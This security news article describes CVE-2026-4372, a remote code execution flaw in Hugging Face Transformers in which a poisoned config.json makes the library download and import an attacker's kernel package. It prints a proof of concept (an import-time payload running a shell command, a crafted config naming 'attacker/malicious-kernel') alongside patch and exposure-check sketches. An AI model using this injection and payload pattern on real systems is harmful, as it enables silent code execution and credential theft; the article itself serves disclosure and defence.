Hugging Face Transformers Security Flaw Allows Remote Code Execution

June 6, 2026

A critical security flaw in Hugging Face Transformers, tracked as CVE-2026-4372, has exposed millions of machine learning workflows to silent remote code execution (RCE) through a malicious model configuration.

Discovered by Pluto Security researcher Yotam Perkal, the issue allows attackers to execute arbitrary code on a victim’s system simply by tricking them into loading a poisoned model via the standard from_pretrained() API, without requiring trust_remote_code=True or any explicit user interaction.


The vulnerability affects Transformers versions 4.56.0 through 5.2.x when used alongside the optional kernels package. The vulnerable code path was introduced in August 2025 and remained exploitable for nearly six months until it was patched in version 5.3.0 in March 2026.

Given the library’s massive footprint, over 2.2 billion installs and approximately 146 million monthly downloads, the exposure window represents a significant supply chain risk for AI pipelines, enterprise ML systems, and research environments.

At the core of the issue is unsafe deserialization of untrusted configuration data. When a model is loaded, the library processes config.json and dynamically assigns all key-value pairs using Python’s setattr().

Figure: PyPI download telemetry (Source: Pluto Security)

This includes internal attributes not meant to be user-controlled. One such attribute, _attn_implementation_internal, determines which attention kernel implementation to load. If controlled by the attacker, this field can point to a malicious Hugging Face repository containing arbitrary Python code.
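The pattern described above can be illustrated with a minimal sketch. ToyConfig is a hypothetical stand-in, not the actual Transformers configuration class, and the "eager" default is only illustrative. The sketch assumes nothing more than what the report describes: every key from config.json is copied onto the object with setattr().

```python
import json


class ToyConfig:
    """Hypothetical stand-in for a config class; not the real Transformers code."""

    def __init__(self, **kwargs):
        # Internal default that users are not expected to override (illustrative value)
        self._attn_implementation_internal = "eager"
        # Blanket assignment: every key found in the file becomes an attribute,
        # including names that were meant to be internal
        for key, value in kwargs.items():
            setattr(self, key, value)


raw = '{"model_type": "llama", "_attn_implementation_internal": "attacker/malicious-kernel"}'
config = ToyConfig(**json.loads(raw))

# The internal field now holds the attacker-supplied value
print(config._attn_implementation_internal)  # prints: attacker/malicious-kernel
```

Because the loop does not distinguish public keys from underscore-prefixed ones, the file's author decides the value of the internal attribute.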

The attack chain becomes critical due to the interaction with the kernels package. If the _attn_implementation_internal value matches a repository pattern like “owner/repo”, the library automatically downloads and imports the corresponding package.

This import occurs without sandboxing, signature verification, or user warnings, effectively turning a configuration field into a code execution primitive.
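To make the "configuration field as code execution primitive" idea concrete, here is a toy dispatcher. The regular expression and both function names are assumptions made for illustration; the library's real matching logic may differ. The functions only return a description of what would happen and never download anything.

```python
import re

# Assumed shape of an "owner/repo" value; the library's real check may differ
REPO_PATTERN = re.compile(r"[\w.-]+/[\w.-]+")


def looks_like_repo(value):
    """Return True when a config value has the shape of a Hub repository ID."""
    return isinstance(value, str) and REPO_PATTERN.fullmatch(value) is not None


def resolve_attention(value):
    """Toy dispatcher: describe which path a given value would take."""
    if looks_like_repo(value):
        # In the vulnerable flow this branch leads to a download and an import
        return f"would download and import kernel from {value}"
    return f"would use built-in implementation {value}"


print(resolve_attention("eager"))
print(resolve_attention("attacker/malicious-kernel"))
```

The point of the sketch is that a purely syntactic test on a string decides whether remote code is fetched, so whoever controls the string controls the branch.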

In a real-world attack scenario, a threat actor uploads a malicious model with a crafted config.json file that contains the injected field. When a victim loads the model using a routine call such as AutoModelForCausalLM.from_pretrained("attacker/model"), the library silently fetches and executes the attacker’s code during initialization.

This occurs even when trust_remote_code is explicitly disabled, breaking the core security assumption on which developers and organizations rely.

Below is a simplified proof-of-concept (PoC) demonstrating how code execution can be triggered via a malicious kernel package:

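# Malicious __init__.py hosted in attacker-controlled HF repo
import os

def exploit():
    # Drop a marker file to show that code ran on the victim's machine
    with open("/tmp/pwned.txt", "w") as f:
        f.write("System compromised\n")
    # Run a shell command and save its output
    os.system("id > /tmp/user_info.txt")

# Runs at import time, as soon as the package is imported
exploit()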

And the corresponding malicious config.json:

{
  "model_type": "llama",
  "_attn_implementation_internal": "attacker/malicious-kernel",
  "vocab_size": 32000
}

When a victim loads the model with:

from transformers import AutoModelForCausalLM
model = AutoModelForCausalLM.from_pretrained("attacker/malicious-model")

the payload executes automatically, leaving artifacts such as /tmp/pwned.txt on the victim’s system.

Successful exploitation enables attackers to steal sensitive data, including AWS credentials, SSH keys, API tokens, and environment variables.

It also enables persistence, lateral movement across cloud infrastructure, and compromise of CI/CD pipelines. The risk is particularly severe in GPU-enabled environments and enterprise ML platforms where the kernels package is commonly installed.

Security researchers emphasize that this vulnerability mirrors previous ML ecosystem flaws, such as PyTorch’s weights_only bypass (CVE-2025-32434), where “safe modes” failed to prevent code execution.

This highlights a recurring design issue in AI frameworks, in which untrusted model artefacts are treated as data rather than as executable input.

The issue has been fixed in Transformers version 5.3.0. The patch introduces a denylist preventing unsafe internal attributes from being set via config files and enforces trust_remote_code=True for external kernel loading. Users are strongly advised to upgrade immediately and avoid loading untrusted models in sensitive environments.
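The two measures in the patch, a denylist on config keys and an explicit opt-in for external kernels, can be sketched roughly as follows. This is not the code from the 5.3.0 release: DENYLISTED_KEYS, sanitize_config and load_external_kernel are hypothetical names, and the set of attributes blocked by the real patch may be different.

```python
# Hypothetical denylist; the attribute names blocked by the real patch may differ
DENYLISTED_KEYS = {"_attn_implementation_internal"}


def sanitize_config(raw_config):
    """Drop denylisted keys so a config file cannot set internal attributes."""
    return {key: value for key, value in raw_config.items() if key not in DENYLISTED_KEYS}


def load_external_kernel(repo_id, trust_remote_code=False):
    """Refuse to fetch code from a repository unless the caller opted in."""
    if not trust_remote_code:
        raise PermissionError(
            f"Loading kernel {repo_id!r} requires trust_remote_code=True"
        )
    # Placeholder: a real loader would download and import the kernel here
    return f"kernel from {repo_id} would be loaded here"


untrusted = {
    "model_type": "llama",
    "_attn_implementation_internal": "attacker/malicious-kernel",
}
clean = sanitize_config(untrusted)
print(clean)  # prints: {'model_type': 'llama'}
```

Filtering happens before any attribute is assigned, and the loader fails closed: without the explicit flag, a repository-shaped value leads to an error rather than an import.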

As a mitigation strategy, organizations should treat all model-loading operations as potential code execution surfaces, enforce sandboxing, restrict outbound network access, and isolate credentials from ML workloads. This incident underscores the growing reality that machine learning supply chains are high-value targets for attackers.
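As a first triage step, teams may want to check whether an environment falls inside the affected range reported above (4.56.0 up to, but not including, 5.3.0, with the kernels package present). The sketch below uses only the standard library. It assumes the packages are published under the distribution names transformers and kernels, and its version parser is deliberately simplified: pre-release suffixes such as rc1 are ignored.

```python
from importlib import metadata


def parse_version(text):
    """Turn '5.2.1' into (5, 2, 1); non-numeric suffixes such as 'rc1' are ignored."""
    parts = []
    for piece in text.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def in_affected_range(version_text):
    """Affected range as reported: 4.56.0 up to, but not including, 5.3.0."""
    return (4, 56, 0) <= parse_version(version_text) < (5, 3, 0)


def installed_version(package):
    """Return the installed version string, or None if the package is absent."""
    try:
        return metadata.version(package)
    except metadata.PackageNotFoundError:
        return None


def environment_is_exposed():
    """True only when an affected transformers version and kernels are both installed."""
    transformers_version = installed_version("transformers")
    kernels_version = installed_version("kernels")
    return (
        transformers_version is not None
        and kernels_version is not None
        and in_affected_range(transformers_version)
    )


print("exposed:", environment_is_exposed())
```

A check like this only reports exposure to this specific flaw. It does not replace sandboxing, network restrictions, or credential isolation.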
